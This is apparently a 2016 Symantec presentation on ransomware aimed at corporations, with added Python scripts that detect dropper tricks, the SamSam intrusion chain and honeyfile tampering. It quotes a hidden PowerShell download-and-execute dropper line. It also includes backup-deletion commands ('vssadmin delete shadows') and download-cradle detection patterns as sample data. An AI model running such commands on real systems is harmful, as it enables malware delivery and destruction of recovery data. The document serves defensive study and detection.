Corporations - the new victims of targeted ransomware
Copyright 2016, Symantec Corporation
Candid Wüest, Symantec Security Response
Ransomware is popular… because it is profitable
Why?
Because it is profitable!
$209 million damage, Jan–March 2016 (according to the FBI)
The common infection vector
– Link to malicious file on Dropbox & Co.
– Office document with malicious macro
– Script file (JavaScript, VBS, PowerShell, …)
  • Sometimes in a container (Zip, RAR, HTA, WSF, LNK, …) with password
• Infected websites
  – Web exploit toolkits (1.4 million attacks blocked / day)
    • Rig, Magnitude etc.
  – Malvertisement
• With any coding language out there
  – Incl. Python, PowerShell, JS, Google's Go language, …
Enabling Macros with Social Engineering
Infection dropper trends
• Use of scripting languages to evade detection/sandboxes
  – Obfuscated: JavaScript, PHP, PowerShell, Python, VBS, …
  – JS conditional compilation trick /*@cc_on @*/
  – Macro to check for VM (environment checks)
    • “InkPicture_Painted” instead of the Document_Open() or AutoOpen() trigger
    • Application.RecentFiles.Count < 3
  – Script to check IPs before payload download (e.g. MaxMind service)
• Payload execution
  – Execute DLL with rundll32.exe and export string
  – Seed parameter from JS (to decrypt payload)
  – Encrypted archive or installer package
Example dropper command line from the slide (URL redacted on the slide):
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://********lied socialinnovation.org/plugins/office365', $f); (New-Object -com WScript.Shell).Exec($f)
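The dropper tricks listed above (hidden PowerShell download cradles, rundll32 export calls, unusual macro triggers, RecentFiles environment checks, the JScript conditional-compilation trick) are exactly the signals a detection engineer would look for in process command lines and in extracted macro source. The following Python script is an added example, not Symantec's code or a vendor signature set: the indicator patterns, the sample command lines (with the URL replaced by a placeholder) and the sample macro are all constructed for illustration.

```python
import re

# Constructed indicator set modelled on the dropper tricks listed on the slide.
# Illustrative patterns only, not a vendor signature set.
POWERSHELL_INDICATORS = {
    "execution_policy_bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "hidden_window":           re.compile(r"-WindowStyle\s*Hidden", re.I),
    "web_download":            re.compile(r"Net\.WebClient|DownloadFile|DownloadString", re.I),
    # drop the payload into a temp file and launch it from the same one-liner
    "temp_drop_and_exec":      re.compile(r"GetTempFileName\(\).*\.Exec\(", re.I | re.S),
}
# rundll32 loading a DLL from a user-writable location and calling an export string;
# plain rundll32 use is common in Windows, so only the path makes this suspicious.
RUNDLL32_USER_PATH = re.compile(
    r"rundll32(?:\.exe)?\s+\S*(?:\\Temp\\|\\AppData\\)\S+\.dll\s*,\s*\w+", re.I)

# Macro entry points: the classic auto-run triggers plus the InkPicture_Painted
# substitute mentioned on the slide (any control-name prefix, e.g. InkPicture1_Painted).
VBA_TRIGGER = re.compile(
    r"\bSub\s+(Document_Open|AutoOpen|Auto_Open|Workbook_Open|\w*InkPicture\w*_Painted)\b", re.I)
CLASSIC_TRIGGERS = {"document_open", "autoopen", "auto_open", "workbook_open"}
# Sandbox/VM evasion: a fresh analysis VM has few or no recently opened documents.
VBA_RECENT_FILES_CHECK = re.compile(r"Application\.RecentFiles\.Count\s*<\s*\d+", re.I)
# JScript conditional compilation: code inside is invisible to non-Microsoft engines.
JS_CC_ON = re.compile(r"/\*@cc_on", re.I)


def score_command_line(cmd: str) -> list:
    """Return the names of dropper indicators matched by one process command line."""
    hits = [name for name, rx in POWERSHELL_INDICATORS.items() if rx.search(cmd)]
    if RUNDLL32_USER_PATH.search(cmd):
        hits.append("rundll32_user_writable_dll")
    return hits


def analyze_macro(src: str) -> dict:
    """Summarise trigger and evasion tricks found in VBA/JScript source text."""
    triggers = [m.group(1) for m in VBA_TRIGGER.finditer(src)]
    unusual = [t for t in triggers if t.lower() not in CLASSIC_TRIGGERS]
    return {
        "triggers": triggers,
        "unusual_trigger": bool(unusual),
        "recent_files_check": bool(VBA_RECENT_FILES_CHECK.search(src)),
        "js_conditional_compilation": bool(JS_CC_ON.search(src)),
    }


# Constructed samples: the first is modelled on the slide's command line with the
# download URL replaced by a placeholder; the second is benign admin use.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command "
    "$f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient)"
    ".DownloadFile('http://example.invalid/plugins/office365', $f); "
    "(New-Object -com WScript.Shell).Exec($f)",
    "powershell.exe -command Get-Process | Sort-Object CPU",
    r"rundll32.exe C:\Users\alice\AppData\Local\Temp\x.dll,Start",
]

# Constructed macro: non-standard trigger plus an environment check before stage 2.
SAMPLE_MACRO = """
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As Long)
    If Application.RecentFiles.Count < 3 Then Exit Sub
    Call RunStage2
End Sub
"""

if __name__ == "__main__":
    for cmd in SAMPLE_COMMAND_LINES:
        print(score_command_line(cmd) or "clean", "<-", cmd[:60])
    print(analyze_macro(SAMPLE_MACRO))
```

In production the command lines would come from process-creation telemetry (Sysmon event 1 or Windows event 4688) and the macro text from an Office-file parser; the scoring stays the same. Note that `execution_policy_bypass` and `hidden_window` on their own are common in legitimate scheduled tasks, so the combination with a network download and temp-file execution is what should drive the alert severity.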
PowerShell ransomware
Ransomware (cryptolocker) expansion
100 new families identified in 2015 (77 in 2014, 88 in 2016*)
Ransomware-as-a-service
Top 10 infections on 29.10.2016
Show me the money
Average ransom demand (chart): 2014 $372.53, 2015 $294.14, 2016 $679.65
• Ransom is usually requested in Bitcoins
• The average ransom has more than doubled last year
How to make even more money?
• Payment features
  – Tesla chat support and free sample decryption
  – CryptXXX steals Bitcoin wallet data
  – Cerber adds machines to a botnet to carry out DDoS attacks
  – Use of Amazon/iTunes/phone gift cards instead of Bitcoins
• New threats added to the ransom note
  – Chimera threatens to post personal data online
  – Jigsaw deletes random files over time
  – Stampado re-encrypts files already encrypted by other cryptolockers
  – Virolock spreads to shares and cloud storage as a file infector
Where are the victims?
Share of infections by country (chart): United States 31%, Japan 8%, Germany 4%, Canada 3%, India 3%, Australia 2%; the United Kingdom, Italy, Belgium and the Netherlands are also shown, with values of 8%, 5%, 4% and 3% that cannot be attributed from the extracted chart.
Currently a big wave in Brazil
Businesses as a target
43% of ransomware infections occur inside organizations
Employees like to open private emails at work
Advanced attack techniques
Recent ransomware attacks use tactics and techniques typically seen in “APT”-style attacks.
Infiltration: Exploit server-side vulnerabilities to gain access to the network.
Reconnaissance: Attackers gather information that may help in later stages of the attack, such as the back-up policy. Information gathered may also be used in the ransom note.
Lateral movement: Attackers use publicly available tools to plot out and traverse the network and gain access to strategic locations like ICS or DB systems.
Stealth: Once the attack has been successfully carried out, the attackers attempt to hide their tracks by removing any tools used.
Example: SamSam case
• Entry point was an unpatched web server; exploited a JBoss vulnerability with JexBoss
• Used PsExec and retrieved passwords to traverse the network
• Deleted backups to make recovery difficult
• Deployed the SamSam strain of ransomware
• Removed copies of the malware and associated tools to hide tracks
• Ransom was 1.5 Bitcoin (~US$989) for each computer
Further TTPs seen
• Attack remote access tools
  – Brute-forcing passwords for RDP, TeamViewer, VNC, FTP, …
• Exploit a web server and jump further from there
  – SQL injection to modify DB content
• Spear phishing
• Some groups try POS or BEC scams first, and then move to ransomware
• Some «APT» groups use ransomware instead of a wiper to hide their intention
Not very sophisticated, but often successful
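The SamSam chain (JBoss exploitation via JexBoss, PsExec for lateral movement, backup deletion before encryption) and the remote-access brute-forcing listed above each leave a distinct trace in logs that already exist in most environments. The script below is an added example written for this page, not Symantec's tooling: it runs three detections over constructed sample data (a web-server access log in Apache combined format and Windows events as dicts). Assumptions labelled in the code: the JBoss admin/invoker paths are not meant to be reachable at all, failed RDP logons are Windows event 4625 with logon type 10, PsExec shows up as a 7045 service install named PSEXESVC, and local recovery points are removed with `vssadmin delete shadows` or `wbadmin delete catalog`.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# JBoss management endpoints that exploitation tools such as JexBoss probe.
# Assumption: these are never meant to be reachable from untrusted networks,
# so any request to them is worth a ticket regardless of the response code.
JBOSS_ADMIN_PATHS = ("/jmx-console", "/web-console", "/invoker/JMXInvokerServlet")
# Apache combined-log style line: ip ident user [time] "METHOD path proto" status ...
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Commands that remove local recovery points; attackers run these before encrypting
BACKUP_TAMPER = re.compile(
    r"vssadmin(?:\.exe)?\s+delete\s+shadows|wbadmin(?:\.exe)?\s+delete\s+catalog", re.I)


def find_jboss_probes(access_lines):
    """Return (ip, path, status) for every request to a JBoss admin/invoker path."""
    hits = []
    for line in access_lines:
        m = ACCESS_LINE.match(line)
        if m and any(m["path"].startswith(p) for p in JBOSS_ADMIN_PATHS):
            hits.append((m["ip"], m["path"], int(m["status"])))
    return hits


def find_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Source IPs with >= threshold failed RDP logons (4625, logon type 10) in one window."""
    failures = defaultdict(list)
    for ev in events:
        if ev["id"] == 4625 and ev.get("logon_type") == 10:
            failures[ev["src_ip"]].append(ev["time"])
    flagged = set()
    for ip, times in failures.items():
        times.sort()
        for i in range(len(times) - threshold + 1):   # sliding window over sorted times
            if times[i + threshold - 1] - times[i] <= window:
                flagged.add(ip)
                break
    return flagged


def find_psexec_and_backup_tampering(events):
    """Flag PsExec service installs (7045, PSEXESVC) and backup-deletion commands (4688)."""
    findings = []
    for ev in events:
        if ev["id"] == 7045 and ev.get("service_name", "").upper().startswith("PSEXESVC"):
            findings.append((ev["host"], "psexec_service_installed"))
        elif ev["id"] == 4688 and BACKUP_TAMPER.search(ev.get("command_line", "")):
            findings.append((ev["host"], "backup_deletion"))
    return findings


# Constructed sample data (documentation IP ranges, fictitious host names).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [29/Oct/2016:02:01:10 +0000] "GET /jmx-console/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [29/Oct/2016:02:01:12 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [29/Oct/2016:02:02:00 +0000] "GET /app/index.jsp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]
T0 = datetime(2016, 10, 29, 2, 10)
SAMPLE_EVENTS = (
    # eight failed RDP logons from one address, 15 seconds apart: brute force
    [{"id": 4625, "host": "TS01", "src_ip": "203.0.113.9", "logon_type": 10,
      "time": T0 + timedelta(seconds=15 * i)} for i in range(8)]
    # two failures an hour apart from another address: a user mistyping a password
    + [{"id": 4625, "host": "TS01", "src_ip": "198.51.100.5", "logon_type": 10,
        "time": T0 + timedelta(hours=i)} for i in range(2)]
    + [{"id": 7045, "host": "FS02", "service_name": "PSEXESVC", "time": T0 + timedelta(minutes=30)},
       {"id": 4688, "host": "FS02", "command_line": "vssadmin.exe delete shadows /all /quiet",
        "time": T0 + timedelta(minutes=31)},
       {"id": 4688, "host": "WS07", "command_line": "notepad.exe C:\\notes.txt",
        "time": T0 + timedelta(minutes=32)}]
)


def triage():
    """Run all three detections over the sample data and return the findings."""
    return {
        "jboss_probes": find_jboss_probes(SAMPLE_ACCESS_LOG),
        "rdp_bruteforce": sorted(find_rdp_bruteforce(SAMPLE_EVENTS)),
        "host_findings": find_psexec_and_backup_tampering(SAMPLE_EVENTS),
    }


if __name__ == "__main__":
    for name, result in triage().items():
        print(name, result)
```

The three detectors are deliberately independent so each can be wired to its own log source; what turns them into a targeted-ransomware story is correlation in time, as the SamSam slide shows: an admin-path probe on the web tier, then a PsExec service on a file server, then recovery points disappearing.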
What are they after?
• Documents
• Databases (encrypt data or change password)
• File shares/cloud (even if not mapped: passwords from mimikatz or enumeration tools)
• Websites
  – E.g. added «mcrypt_encrypt()» to DB calls
• The backups (to delete them, infect them or encrypt them)
• In some rare cases industrial controllers (more likely classical blackmailing)
Victim organization profile
Services 37.8%
Manufacturing 17.2%
Public Administration 10.2%
Finance, Insurance, & Real Estate 9.8%
Wholesale 8.9%
Transportation, Comms, & Utilities 6.6%
Retail 4.3%
Construction 3.9%
Mining 1.0%
Agri, Forestry, & Fishing 0.5%
What about healthcare? Healthcare is seeing more targeted attacks and is therefore not reflected in the numbers.
Crypto is difficult (for most people)
Protection strategies
• Back up your data (out of reach!)
• Keep your system and software up to date
• Double-check shared folders
  – Does it auto-sync to the cloud?
  – How is your file server protected?
• Follow best practices (2FA, security software, …)
  – Disable scripts, PowerShell etc. if you don't use them
• Be prepared: play the exercise drill
• Some have experimented with «honeyfiles» and «folder-sinkholes»
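The «honeyfiles» idea in the last bullet is simple to build: plant decoy documents nobody has a reason to touch, record their hashes, and treat any modification, rename or deletion as a sign that an encryptor is running. The script below is an added example, not Symantec's code or a product feature; the decoy names are constructed, and `demo()` simulates an encryptor's file operations (overwrite in place, overwrite-and-rename with a new extension) inside a temporary directory purely to exercise the check.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Constructed decoy names. The leading "!" sorts them first, so a process that
# walks a share alphabetically (as many crypto-lockers do) hits them early;
# the rest of the name makes them look worth opening.
HONEYFILE_NAMES = ["!budget_2016.xlsx", "!passwords_old.docx", "!zz_archive.pdf"]


def sha256_of(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def plant_honeyfiles(directory, names=HONEYFILE_NAMES):
    """Write decoy files and return the baseline {name: sha256} to check against later."""
    baseline = {}
    for name in names:
        p = Path(directory) / name
        p.write_bytes(b"decoy document - " + name.encode())
        baseline[name] = sha256_of(p)
    return baseline


def check_honeyfiles(directory, baseline):
    """Return (name, reason) for every decoy that was modified, renamed or deleted.

    No legitimate process should touch a decoy, so any alert is a strong signal and
    a good trigger for isolating the host that holds the share open.
    """
    present = {p.name for p in Path(directory).iterdir()}
    alerts = []
    for name, digest in sorted(baseline.items()):
        p = Path(directory) / name
        if p.exists():
            if sha256_of(p) != digest:
                alerts.append((name, "content changed"))
        else:
            # many crypto-lockers write ciphertext under a new extension and remove the original
            renamed = sorted(n for n in present if n.startswith(name) and n != name)
            alerts.append((name, "renamed to " + renamed[0] if renamed else "deleted"))
    return alerts


def demo():
    """Plant decoys in a temp dir, simulate what an encryptor does to two of them, report."""
    with tempfile.TemporaryDirectory() as d:
        baseline = plant_honeyfiles(d)
        # simulation only: overwrite one decoy in place ...
        (Path(d) / "!budget_2016.xlsx").write_bytes(os.urandom(64))
        # ... and overwrite-and-rename another, as a locker that appends an extension would
        victim = Path(d) / "!passwords_old.docx"
        victim.write_bytes(os.urandom(64))
        victim.rename(victim.with_name(victim.name + ".locked"))
        return check_honeyfiles(d, baseline)


if __name__ == "__main__":
    for name, reason in demo():
        print(f"ALERT honeyfile {name}: {reason}")
```

In practice `check_honeyfiles` would run on a short timer (or be replaced by a file-system change notification) against decoys planted on the file shares the slide warns about, and the alert would feed the same playbook as the exercise drill: disconnect the share, find the session that wrote to it, then restore from the out-of-reach backup.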
Don’t forget your phones
• Android ransomware is out there
• IoT device ransomware not seen at large in the wild, but possible
Summary – keep your data safe!
• 100 new families identified in 2015, most not sophisticated
• Scripts are popular to evade first-step detection
• Employees in organizations represent 43% of infections
• There are ransomware groups going after organizations
• Most attacks are not targeted, but still devastating
• It is profitable for the attackers, so it won’t go away overnight
Thank you!
Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.
This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
Candid Wüest, Threat Researcher, Symantec Security Response